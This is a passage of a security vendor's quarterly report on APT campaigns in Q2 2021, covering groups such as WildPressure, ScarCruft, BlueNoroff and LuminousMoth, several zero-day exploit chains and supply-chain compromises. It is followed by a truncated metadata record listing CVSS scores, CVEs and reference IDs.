several samples of the group's unique .NET backdoor in our telemetry that were formerly unknown to us, one of which was recently detected in Saudi Arabia. By pivoting on new infrastructure indicators that we observed in those samples, we were able to find a particular C2 server that was contacted by a malicious Android implant and shows ties to the group's activity.\n\nWe previously covered a WildPressure campaign against targets in the Middle East . Keeping track of the threat actor's malware this spring, we were able to find a newer version (1.6.1) of their C++ Trojan, a corresponding VBScript variant with the same version and a completely new set of modules, including an orchestrator and three plugins. This confirms our previous assumption that there are more last-stagers besides the C++ ones, based on one of the fields in the C2 communication protocol which contains the "client" programming language. Another language used by WildPressure is Python. The PyInstaller module for Windows contains a script named "Guard". Perhaps the most interesting finding here is that this malware was developed for both Windows and macOS operating systems. In this case, the hardcoded version is 2.2.1. The coding style, overall design and C2 communication protocol is quite recognisable across all programming languages used by the attackers. The malware used by WildPressure is still under active development in terms of versions and programming languages in use. Although we could not associate WildPressure's activity with other threat actors, we did find minor similarities in the TTPs (Tactics, Techniques and Procedures) used by BlackShadow, which is also active in the same region. However, we consider that these similarities serve as minor ties and are not enough to make any attribution.\n\nWe discovered an ongoing campaign that we attribute to an actor named WIRTE, beginning in late 2019, targeting multiple sectors, focused on the Middle East. WIRTE is a lesser-known threat actor first publicly referenced in 2019, which we suspect has relations with the Gaza Cybergang threat actor group. During our hunting efforts, in February, for threat actor groups that are using VBS/VBA implants, we came across MS Excel droppers that use hidden spreadsheets and VBA macros to drop their first stage implant - a VBS script. The VBS script's main function is to collect system information and execute arbitrary code sent by the attackers. Although we recently reported on a new Muddywater first stage VBS implant used for reconnaissance and profiling activities, these intrusion sets have slightly different TTPs and wider targeting. To date, we have recorded victims focused in the Middle East and a few other countries outside this region. Despite various industries being affected, the focus was mainly towards government and diplomatic entities; however, we also noticed an unusual targeting of law firms.\n\nGoldenJackal is the name we have given to a cluster of activity, recently discovered in our telemetry, that has been active since November 2019. This intrusion set consists of a set of .NET-based implants that are intended to control victim machines and exfiltrate certain files from them, suggesting that the actor's primary motivation is espionage. Furthermore, the implants were found in a restricted set of machines associated with diplomatic entities in the Middle East. Analysis of the aforementioned malware, as well as the accompanied detection logs, portray a capable and moderately stealthy actor. This can be substantiated by the successful foothold gained by the underlying actor in the few organizations we came across, all the while keeping a low signature and ambiguous footprint.\n\n## Southeast Asia and Korean Peninsula\n\nThe ScarCruft group is a geo-political motivated APT group that usually attacks government entities, diplomats and individuals associated with North Korean affairs. Following our last report about this group, we had not seen its activities for almost a year. However, we observed that ScarCruft compromised a North Korea-related news media website in January, beginning a campaign that was active until March. The attackers utilized the same exploit chains, CVE-2020-1380 and CVE-2020-0986, also used in [Operation Powerfall](<https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/>). Based on the exploit code and infection scheme characteristics, we suspect that Operation PowerFall has a connection with the ScarCruft group. The exploit chain contains several stages of shellcode execution, finally deploying a Windows executable payload in memory. We discovered several victims from South Korea and Singapore. Besides this watering-hole attack, this group also used Windows executable malware concealing its payload. This malware, dubbed "ATTACK-SYSTEM", also used multi-stage shellcode infection to deliver the same final payload named "BlueLight". BlueLight uses OneDrive for C2. Historically, ScarCruft malware, especially RokRat, took advantage of personal cloud servers as C2 servers, such as pCloud, Box, Dropbox, and Yandex.\n\nIn May 2020, the Criminal Investigation Bureau (CIB) of Taiwan published an announcement about an attack targeting Taiwanese legislators. Based on their information, an unknown attacker sent spear-phishing emails using a fake presidential palace email account, delivering malware we dubbed "Palwan". Palwan is malware capable of performing basic backdoor functionality as well as downloading further modules with additional capabilities. Analysing the malware, we discovered another campaign, active in parallel, targeting Nepal. We also found two more waves of attacks launched against Nepal in October 2020 and in January this year using Palwan malware variants. We suspect that the targeted sector in Nepal is similar to the one reported by the CIB of Taiwan. Investigating the infrastructure used in the Nepal campaigns, we spotted an overlap with Dropping Elephant activity. However, we don't deem this overlap sufficient to attribute this activity to the Dropping Elephant threat actor.\n\nBlueNoroff is a long-standing, financially motivated APT group that has been targeting the financial industry for years. In recent operations, the group has focused on cryptocurrency businesses. Since the publication of our research of BlueNoroff's "SnatchCrypto" campaign in 2020, the group's strategy to deliver malware has evolved. In this campaign, BlueNoroff used a malicious Word document exploiting CVE-2017-0199, a remote template injection vulnerability. The injected template contains a Visual Basic script, which is responsible for decoding the next payload from the initial Word document and injecting it into a legitimate process. The injected payload creates a persistent backdoor on the victim's machine. We observed several types of backdoor. For further surveillance of the victim, the malware operator may also deploy additional tools. BlueNoroff has notably set up fake blockchain, or cryptocurrency-related, company websites for this campaign, to lure potential victims and initiate the infection process. Numerous decoy documents were used, which contain business and nondisclosure agreements as well as business introductions. When compared to the previous SnatchCrypto campaign, the BlueNoroff group utilized a similar backdoor and PowerShell agent but changed the initial infection vector. Windows shortcut files attached to spear-phishing emails used to be the starting point for an infection: they have now been replaced by weaponized Word documents.\n\nWe have discovered [Andariel activity](<https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/>) using a revised infection scheme and custom ransomware targeting a broad spectrum of industries located in South Korea. In April, we observed a suspicious document containing a Korean file name and decoy uploaded to VirusTotal. It revealed a novel infection scheme and an unfamiliar payload. During the course of our research, Malwarebytes published a report with technical details about the same series of attacks, which attributed it to the Lazarus group. After a deep analysis we reached a different conclusion - that the Andariel group was behind these attacks. Code overlaps between the second stage payload in this campaign and previous malware from the Andariel group allowed for this attribution. Apart from the code similarity and the victimology, we found additional connections with the Andariel group. Each threat actor has a characteristic habit when they interactively work with a backdoor shell in the post-exploitation phase. The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity. The threat actor has been spreading the third stage payload since the middle of 2020 and leveraged malicious Word documents and files mimicking PDF documents as infection vectors. Notably, in addition to the final backdoor, we discovered one victim infected with custom ransomware. This ransomware adds another facet to this Andariel campaign, which also sought financial profit in a previous operation involving the compromise of ATMs.\n\nWe recently uncovered a large-scale and highly active attack in Southeast Asia coming from a threat actor we dubbed [LuminousMoth](<https://securelist.com/apt-luminousmoth/103332/>). Further analysis revealed that this malicious activity dates back to October 2020 and was still ongoing at the time we reported it in June. LuminousMoth takes advantage of DLL sideloading to download and execute a Cobalt Strike payload. However, perhaps the most interesting part of this attack is its capability to spread to other hosts by infecting USB drives. In addition to the malicious DLLs, the attackers also deployed a signed, but fake version of the popular application Zoom on some infected systems, enabling them to exfiltrate files; and an additional tool that accesses a victim's Gmail session by stealing cookies from the Chrome browser. Infrastructure ties as well as shared TTPs allude to a possible connection between LuminousMoth and the HoneyMyte threat group, which was seen targeting the same region and using similar tools in the past. Most early sightings of this activity were in Myanmar, but it now appears that the attackers are much more active in the Philippines, where the number of known attacks has grown more than tenfold. This raises the question of whether this is caused by a rapid replication through removable devices or by an unknown infection vector, such as a watering-hole focusing on the Philippines.\n\nWe recently reported SideCopy campaigns attacking the Windows platform together with Android-based implants. These implants turned out to be multiple applications working as information stealers to collect sensitive information from victims' devices, such as contact lists, SMS messages, call recordings, media and other types of data. Following up, we discovered additional malicious Android applications, some of them purporting to be known messaging apps like Signal or an adult chat platform. These newly discovered applications use the Firebase messaging service as a channel to receive commands. The operator is able to control if either Dropbox or another, hard coded server is used to exfiltrate stolen files.\n\n## Other interesting discoveries\n\nExpanding our research on the exploit targeting CVE-2021-1732, originally discovered by DBAPPSecurity Threat Intelligence Center and used by the Bitter APT group, [we discovered another possible zero-day exploit used in the Asia-Pacific (APAC) region](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>). Interestingly, the exploit was found in the wild as part of a separate framework, alongside CVE-2021-1732 as well as other previously patched exploits. We are highly confident that this framework is entirely unrelated to Bitter APT and was used by a different threat actor. Further analysis revealed that this Escalation of Privilege (EoP) exploit has potentially been used in the wild since at least November 2020. Upon discovery, we reported this new exploit to Microsoft in February. After confirmation that we were indeed dealing with a new zero-day, it received the designation CVE-2021-28310.\n\nVarious marks and artifacts left in the exploit mean that we are also highly confident that CVE-2021-1732 and CVE-2021-28310 were created by the same exploit developer that we track as "Moses". "Moses" appears to be an exploit developer who makes exploits available to several threat actors, based on other past exploits and the actors observed using them. To date, we have confirmed that at least two known threat actors have utilized exploits originally developed by Moses: Bitter APT and Dark Hotel. Based on similar marks and artifacts, as well as privately obtained information from third parties, we believe at least six vulnerabilities observed in the wild in the last two years have originated from "Moses". While the EoP exploit was discovered in the wild, we are currently unable to directly tie its usage to any known threat actor that we are currently tracking. The EoP exploit was probably chained together with other browser exploits to escape sandboxes and obtain system level privileges for further access. Unfortunately, we weren't able to capture a full exploit chain, so we don't know if the exploit is used with another browser zero-day, or coupled with exploits taking advantage of known, patched vulnerabilities.\n\nIn another, more recent investigation into the surge of attacks by APT actors against Exchange servers following the revelation of ProxyLogon and other Exchange vulnerabilities, we took note of one unique cluster of activity. It attracted our attention because the actor behind it seemed to have been active in compromising Exchange servers since at least December 2020, all the while using a toolset that we were not able to associate with any known threat group. During March, several waves of attacks on Exchange servers were made public, partially describing the same cluster of activity that we had observed. One of them, reported by ESET, contained an assessment that the actor behind this activity had access to the Exchange exploits prior to their public release, which aligns with our observations of the early activity of it last year. That said, none of the public accounts described sightings of the full infection chain and later stages of malware deployed as part of this group's operation. Adopting the name Websiic, given publicly to this cluster of activity by ESET, we reported the TTPs of the underlying threat actor. Namely, we focused on the usage of both commodity tools like the China Chopper webshell and a proprietary .NET backdoor used by the group, which we dubbed "Samurai", as well as describing a broader set of targets than the one documented thus far.\n\nOn 15 April, Codecov publicly disclosed that its Bash Uploader script had been compromised and was distributed to users between the 31 January and the 1 April. The Bash Uploader script is publicly distributed by Codecov and aims to gather information on the user's execution environments, collect code coverage reports, and send them to the Codecov infrastructure. As a result, this script compromise effectively constitutes a supply-chain attack. The Bash uploader script is typically executed as a trusted resource in development and testing environments (including as part of automated build processes, such as continuous integration or development pipelines); and its compromise could enable malicious access to infrastructure or account secrets, as well as code repositories and source code. While we haven't been able to confirm the malicious script deployment, retrieve any information on the compromise goals, or identify further associated malicious tools yet, we were able to collect one sample of a compromised Bash uploader script, as well as identify some possibly associated additional malicious servers.\n\nAn e-mail sent by Click Studios to its customers on 22 April informed them that a sophisticated threat actor had gained access to the Passwordstate automatic updating functionality, referred to as the in-place upgrade. Passwordstate is a password management tool for enterprises, and on 20 April, for a period of about 28 hours, a malicious DLL was included in the software updates. On 24 April, an incident management advisory was also released. The purpose of the campaign was to steal passwords stored in the password manager. Although this attack was only active for a short time, we managed to obtain the malicious DLLs and reported our initial findings. Nevertheless, it's still unclear how the attackers gained access to the Passwordstate software to begin with. Following a new advisory published by Click Studio on 28 April, we discovered a new variant of the malicious DLL used to backdoor the Passwordstate password manager. This DLL variant was distributed in a phishing campaign, most likely by the same actor.\n\nA few days after April's Patch Tuesday updates from Microsoft (13 April), a number of suspicious files caught our attention. These files were binaries, disguised as "April 2021 Security Update Installers". They were signed with a valid digital signature, delivering Cobalt Strike beacon modules. It is likely that the modules were signed with a stolen digital certificate. These Cobalt Strike beacon implants were configured with a hardcoded C2, "code.microsoft.com". Contrary to a (now redacted) publication from the Qihoo 360 team revolving around this activity, we can confirm that there was no compromise of Microsoft's infrastructure. In fact, an unauthorized party took over the dangling subdomain "code.microsoft.com" and configured it to resolve to their Cobalt Strike host, setup around 15 April. That domain hosted a Cobalt Strike beacon payload served to HTTP clients using a specific and unique user agent. According to Microsoft and the initial Qihoo notification, the impact in this case was very limited and didn't affect unsuspecting visitors to this website because of the required unique user agent.\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web-browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. The EoP exploit was fine-tuned to work against the latest and the most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2) and it exploits two distinct vulnerabilities in the Microsoft Windows OS kernel. On April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as a part of the June Patch Tuesday. The exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a "remote shell"-style backdoor which in turns connects to the C2 to get commands. So far, we haven't been able to find any connections or overlaps with a known actor. Therefore, we are tentatively calling this cluster of activity [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\nOn April 16, we began hearing rumors about active exploitation of Pulse Secure devices from other researchers in the community. One day prior to this, the NSA, CISA, and FBI had jointly published an advisory stating that APT29 was conducting widespread scanning and exploitation of vulnerable systems, including Pulse Secure. For this reason, initial thoughts were that the two were related; and these were just rumors circulating the community about old activity that was being brought to light again. Following this, we were able to at least confirm that the initial rumors were part of a separate set of activities that had occurred between January and March and were not directly related to the advisory mentioned above. This new activity involved the exploitation of at least two vulnerabilities in Pulse Secure; one previously patched and one zero-day (CVE-2021-22893). We also became aware of affected organizations that were notified by a third party that they were potentially compromised by this activity. After exploitation, the threat actor proceeded to deploy a simple webshell to maintain persistence. On May 3, Pulse Secure delivered "out-of-cycle" update and workaround packages to provide a solution for the multiple vulnerabilities.\n\nCooperating with Check Point Research, we discovered an ongoing attack targeting a small group of individuals in Xinjiang and Pakistan, in regions mostly populated by the Uyghur minority. The attackers used malicious executables that collect information about the infected system and attempt to download a second-stage payload. The actor put considerable effort into disguising the payloads, whether by creating delivery documents that appear to be originating from the United Nations using up-to-date related themes, or by setting up websites for non-existing organizations claiming to fund charity groups. In our report, we examined the flow of both infection vectors and provided our analysis of the malicious artifacts we came across during this investigation, even though we were unable to obtain the later stages of the infection chain.\n\n## Final thoughts\n\nWhile the TTPs of some threat actors remain consistent over time, relying heavily on social engineering as a means of gaining a foothold in a target organisation or compromising an individual's device, others refresh their toolsets and extend the scope of their activities. Our regular quarterly reviews are intended to highlight the key developments of APT groups.\n\nHere are the main trends that we've seen in Q2 2021:\n\n * We have reported several supply-chain attacks in recent months.. While some were major and have attracted worldwide attention, we observed equally successful low-tech attacks, such as BountyGlad, CoughingDown and the attack targeting Codecov.\n * APT groups mainly use social engineering to gain an initial foothold in a target network. However, we've seen a rise in APT threat actors leveraging exploits to gain that initial foothold - including the zero-days developed by the exploit developer we call "Moses" and those used in the PuzzleMaker, Pulse Secure attacks and the Exchange server vulnerabilities.\n * APT threat actors typically refresh and update their toolsets: this includes not only the inclusion of new platforms but also the use of additional languages as seen by WildPressure's macOS-supported Python malware.\n * As illustrated by the campaigns of various threat actors - including BountyGlad, HotCousin, GoldenJackal, Scarcruft, Palwan, Pulse Secure and the threat actor behind the WebDav-O/Mail-O implants - geo-politics continues to drive APT developments.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "published": "2021-07-29T10:00:46", "modified": "2021-07-29T10:00:46", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://securelist.com/apt-trends-report-q2-2021/103517/", "reporter": "GReAT", "references": [], "cvelist": ["CVE-2017-0199", "CVE-2020-0986", "CVE-2020-1380", "CVE-2021-1732", "CVE-2021-22893", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956"], "immutableFields": [], "lastseen": "2021-08-04T10:41:58", "viewCount": 1133, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:007C4393-6621-4656-8BFD-D0CFE64DCD65", "AKB:03F5DDB7-DFAF-4815-9563-05762A387A0A", "AKB:0E829C08-804A-436D-A730-1B474A82E4A7", "AKB:160D34D9-2175-4B27-87F8-0CED51121F50", "AKB:21C170FF-C7C6-4BFB-8AED-613970EDA44C", "AKB:2BD24459-EE7D-4EB8-92A6-7C77689BCC8D", "AKB:2F48FB8A-EF4C-468F-9F4F-8BB9BB5FEC97", "AKB:5BE82C1E-061F-4C04-93A2-1C15BBDE9337", "AKB:925F84D3-4FE0-4A18-BAA9-170C701E718D", "AKB:9E1E5A73-8C4D-4A6A-96A5-14A9041AA2CB", "AKB:DFA2540D-E431-4CDE-B67A-7EA3F2B87A74", "AKB:F48CAEEE-E809-405D-B7AD-48D94140C67D", "AKB:F65CF017-1855-42E3-9922-BF6F9F078DD9"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A", "AVLEONOV:24538B1ED96269982136AA43998E5780", "AVLEONOV:9D3D76F4CC74C7ABB8000BC6AFB2A2CE", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:F17F36C3CC642EBDC27E43900FE3905E"]}, {"type": "canvas", "idList": ["OFFICE_WSDL"]}, {"type": "cert", "idList": ["VU:213092", "VU:921560"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0251", "CPAI-2020-0521", "CPAI-2020-0727", "CPAI-2021-0032", "CPAI-2021-0223", "CPAI-2021-0316", "CPAI-2021-0318", "CPAI-2021-0877"]}, {"type": "cisa", "idList": ["CISA:41E2EC8FEF1331C724A39C3DCCFB0834", "CISA:911DE59572B6EF78B42DD868D622F637", "CISA:B788AAE055F3DE2C255FCC0E7BE16B4B"]}, {"type": "cve", "idList": ["CVE-2017-0199", "CVE-2020-0986", "CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316", "CVE-2020-1380", "CVE-2020-1555", "CVE-2020-1570", "CVE-2021-1698", "CVE-2021-1732", "CVE-2021-22893", "CVE-2021-27072", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956"]}, {"type": "exploitdb", "idList": ["EDB-ID:41894", "EDB-ID:41934", "EDB-ID:44263"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1B366A9B404A79180DAB2A9C4AE015B0", "EXPLOITPACK:26C6702FE71DE1FE3096B330AA74AD07"]}, {"type": "fireeye", "idList": ["FIREEYE:35D0439B3D476357F4D2F51F3D5CD294", "FIREEYE:37C92D78C4F9986624FA2FB49CBCB764", "FIREEYE:4B85E44D28C8512270923B36728CBD59", "FIREEYE:61901D6D8B7FE74193954DA723EA43FC", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "FIREEYE:8926956380F9C38D0DE9955F5D9CBE06", "FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED", "FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "FIREEYE:92F27B3F6B5FC8C7C22B088678232819", "FIREEYE:9503F430A48297769A46076960747B2F", "FIREEYE:9CF80EFF287EE06F7EC0094727FE9C26", "FIREEYE:A19A2394490AB386D95215A17EEA2FC0", "FIREEYE:AA5B50E5C593F4E6EFF300E3DE9EDB85", "FIREEYE:ABF21A18BEF0ABDDD461684446C0A772", "FIREEYE:E28F2F7E1B1F4BDA33635C841E315BCA", "FIREEYE:E77EEC61CF4FE2F4BDB43A5A0C15A644", "FIREEYE:F3E71742D8E5D617D6B77A2DB930882F", "FIREEYE:F58154E35F166E87B591935191A7EA69"]}, {"type": "githubexploit", "idList": ["02C6FE13-5036-5BE5-8AC8-278A918BA581", "0885D472-B052-5B6B-A8C9-19FDD33EFF42", "1C45657B-E388-5668-9093-F3934858B728", "1D0AAF42-5E68-5985-A800-90937D55628D", "241CA368-5AF2-555C-91EE-5D10B229F97D", "25DCDCD3-A32C-5B44-B706-FFF9535ECFC2", "399B15EF-A742-5722-86D2-59F3580C307B", "453B4EEE-340B-58DA-84D9-277C9D4EFC12", "51858F11-1259-5A40-82DF-DD7D62A7B11A", "5E516DC2-BF71-57D0-9A87-3874146D0F83", "730EEC4F-BE81-5690-BA8D-B89482C5C3D0", "7CEBB62C-173B-50CD-A252-B6522523EE57", "82A7AD32-D5F8-59E5-AC8B-6B99F9E33F64", "8DBBEAEC-C905-52CD-B95C-87663EA9C145", "91A5BC48-2410-555B-B7FB-8138577D6B78", "DEAA3BF4-9E7D-55E9-9534-6203A312C46F", "E90678A1-4183-5E58-A4E2-5E48E8767D92", "FBC7C8E7-D9E9-50AF-A463-1504B4FC5BE9"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA", "GOOGLEPROJECTZERO:A596034F451F58030932B2FC46FB6F38", "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hivepro", "idList": ["HIVEPRO:E73184FF060DA7208BAF888A5AF221EF"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}, {"type": "kaspersky", "idList": ["KLA10995", "KLA11024", "KLA11059", "KLA11807", "KLA11835", "KLA11935", "KLA12071", "KLA12139", "KLA12198", "KLA12202"]}, {"type": "krebs", "idList": ["KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7", "KREBS:A8F0DD3F6E965A3A66B2CCBB003ACF62", "KREBS:E374075CAB55D7AB06EBD73CB87D33CD", "KREBS:F8A52CE066D12F4E4A9E0128831BF48D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:16440CAA6CF5418D984950D297C8549D", "MALWAREBYTES:2D17A77CBCBBFFE150012C3B71E53FC6", "MALWAREBYTES:3322D6B92554507E3E44D06E2BA5E174", "MALWAREBYTES:3350250AEB75AAF452630CE0B7306455", "MALWAREBYTES:3C358DDA439A247A9677866AFE8FA961", "MALWAREBYTES:4690DE85CA58136434BF7E127237802F", "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "MALWAREBYTES:6A30A2B661E06D2D7D26479F27BB0EF3", "MALWAREBYTES:7D6B4BABB8063861BF6305FDC03DBE1C", "MALWAREBYTES:84CB84E43C5F560FDE9B8B7E65F7C4A3", "MALWAREBYTES:B24AD5C8381AD8F711BC02246606B36A", "MALWAREBYTES:C0A087A65BF94128AA1574F7D45E306B", "MALWAREBYTES:F40C2861F5D3CFF011E96C0D46C51A46", "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-FILEFORMAT-OFFICE_WORD_HTA-", "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2022_21882_WIN32K-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0199", "MS:CVE-2020-0986", "MS:CVE-2020-1380", "MS:CVE-2021-1698", "MS:CVE-2021-1732", "MS:CVE-2021-27072", "MS:CVE-2021-28310", "MS:CVE-2021-31955", "MS:CVE-2021-31956"]}, {"type": "mskb", "idList": ["KB3141529", "KB3141538", "KB3178703", "KB3178710", "KB4014793", "KB4556799"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:7D81C7477636B6DB964C5D3E62D605D5", "MSSECURE:A133B2DDF50F8BE904591C1BB592991A"]}, {"type": "myhack58", "idList": ["MYHACK58:62201785187", "MYHACK58:62201785189", "MYHACK58:62201785243", "MYHACK58:62201785268", "MYHACK58:62201785272", "MYHACK58:62201785331", "MYHACK58:62201786816", "MYHACK58:62201786827", "MYHACK58:62201788439", "MYHACK58:62201788542", "MYHACK58:62201789251", "MYHACK58:62201789425", "MYHACK58:62201891024", "MYHACK58:62201994516"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "PULSE_CONNECT_SECURE-SA44784.NASL", "SMB_NT_MS17-010.NASL", "SMB_NT_MS17-APR_4015551.NASL", "SMB_NT_MS17_APR_4014793.NASL", "SMB_NT_MS17_APR_4015549.NASL", "SMB_NT_MS17_APR_OFFICE.NASL", "SMB_NT_MS20_AUG_4565349.NASL", "SMB_NT_MS20_AUG_4565351.NASL", "SMB_NT_MS20_AUG_4566782.NASL", "SMB_NT_MS20_AUG_4571692.NASL", "SMB_NT_MS20_AUG_4571694.NASL", "SMB_NT_MS20_AUG_4571703.NASL", "SMB_NT_MS20_AUG_4571709.NASL", "SMB_NT_MS20_AUG_4571729.NASL", "SMB_NT_MS20_AUG_4571736.NASL", "SMB_NT_MS20_AUG_4571741.NASL", "SMB_NT_MS20_AUG_INTERNET_EXPLORER.NASL", "SMB_NT_MS20_JUN_4557957.NASL", "SMB_NT_MS20_JUN_4560960.NASL", "SMB_NT_MS20_JUN_4561602.NASL", "SMB_NT_MS20_JUN_4561608.NASL", "SMB_NT_MS20_JUN_4561612.NASL", "SMB_NT_MS20_JUN_4561616.NASL", "SMB_NT_MS20_JUN_4561621.NASL", "SMB_NT_MS20_JUN_4561649.NASL", "SMB_NT_MS20_JUN_4561666.NASL", "SMB_NT_MS21_APR_5001330.NASL", "SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_FEB_4601315.NASL", "SMB_NT_MS21_FEB_4601319.NASL", "SMB_NT_MS21_FEB_4601345.NASL", "SMB_NT_MS21_FEB_4601354.NASL", "SMB_NT_MS21_JUN_5003635.NASL", "SMB_NT_MS21_JUN_5003637.NASL", "SMB_NT_MS21_JUN_5003638.NASL", "SMB_NT_MS21_JUN_5003646.NASL", "SMB_NT_MS21_JUN_5003681.NASL", "SMB_NT_MS21_JUN_5003687.NASL", "SMB_NT_MS21_JUN_5003694.NASL", "SMB_NT_MS21_JUN_5003695.NASL", "SMB_NT_MS21_JUN_5003697.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810686", "OPENVAS:1361412562310810687", "OPENVAS:1361412562310810688", "OPENVAS:1361412562310810689", "OPENVAS:1361412562310810690", "OPENVAS:1361412562310810692", "OPENVAS:1361412562310810850", "OPENVAS:1361412562310810851", "OPENVAS:1361412562310817063", "OPENVAS:1361412562310817140", "OPENVAS:1361412562310817141", "OPENVAS:1361412562310817142", "OPENVAS:1361412562310817143", "OPENVAS:1361412562310817144", "OPENVAS:1361412562310817145", "OPENVAS:1361412562310817146", "OPENVAS:1361412562310817157"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142211", "PACKETSTORM:142281", "PACKETSTORM:143164", "PACKETSTORM:161880", "PACKETSTORM:166169"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:22507355C87630C1D3B720E2ED98701A", "QUALYSBLOG:23EF75126B24C22C999DAD4D7A2E9DF5", "QUALYSBLOG:352650F44A686E31669777DBEC831101", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:A8EE36FB3E891C73934CB1C60E3B3D41", "QUALYSBLOG:AD927BF1D1CDE26A3D54D9452C330BB3", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:FFC962F3C57B514805A24EA07FF565A1"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26", "RAPID7BLOG:4BFD931715758C7B7E2711A580BFEA5E", "RAPID7BLOG:D435EE51E7D9443C43ADC937A046683C", "RAPID7BLOG:E44F025D612AC4EA5DF9F2B56FF8680C", "RAPID7BLOG:F4F1A7CFCF2440B1B23C1904402DDAF2"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:BDA3EA90B57FC8895B98DAADBAE3D7DE", "RAPID7COMMUNITY:DADF9A5B22CCB70155177EBC2E86131E"]}, {"type": "saint", "idList": ["SAINT:3A3289A18B5C46A88581C9E8D4D0CF5A", "SAINT:5DC0FF1D23C8E8C36A1A8D72F1EB2B74", "SAINT:DB6048DE08200736030664D3F0E6C764"]}, {"type": "securelist", "idList": ["SECURELIST:03ACF8FB3AEA9D33D265642AD60AF9E9", "SECURELIST:0C40BC07DFF80D4B158D166D0DC2C870", "SECURELIST:1F59148E6615695438F94EF4956585AA", "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:29152837444B2A7E5A9B9FCB107DAB36", "SECURELIST:322E7EEAE549CDB14513C2EDB141B8BA", "SECURELIST:376CB760FDD4E056A8D0695A9EB9756A", "SECURELIST:3DB11A5605F77743FA5F931DF816A83C", "SECURELIST:4FE9AF32AEB194433587B75288D50FDA", "SECURELIST:6C418779587ADE032AB673F44440002B", "SECURELIST:6E5BCE8A736D28A7E168E1CD5131CE3D", "SECURELIST:70BCDF20EABD280713CFF28CEE3C6374", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:75F0B75D28318C525992E42495D8C5EE", 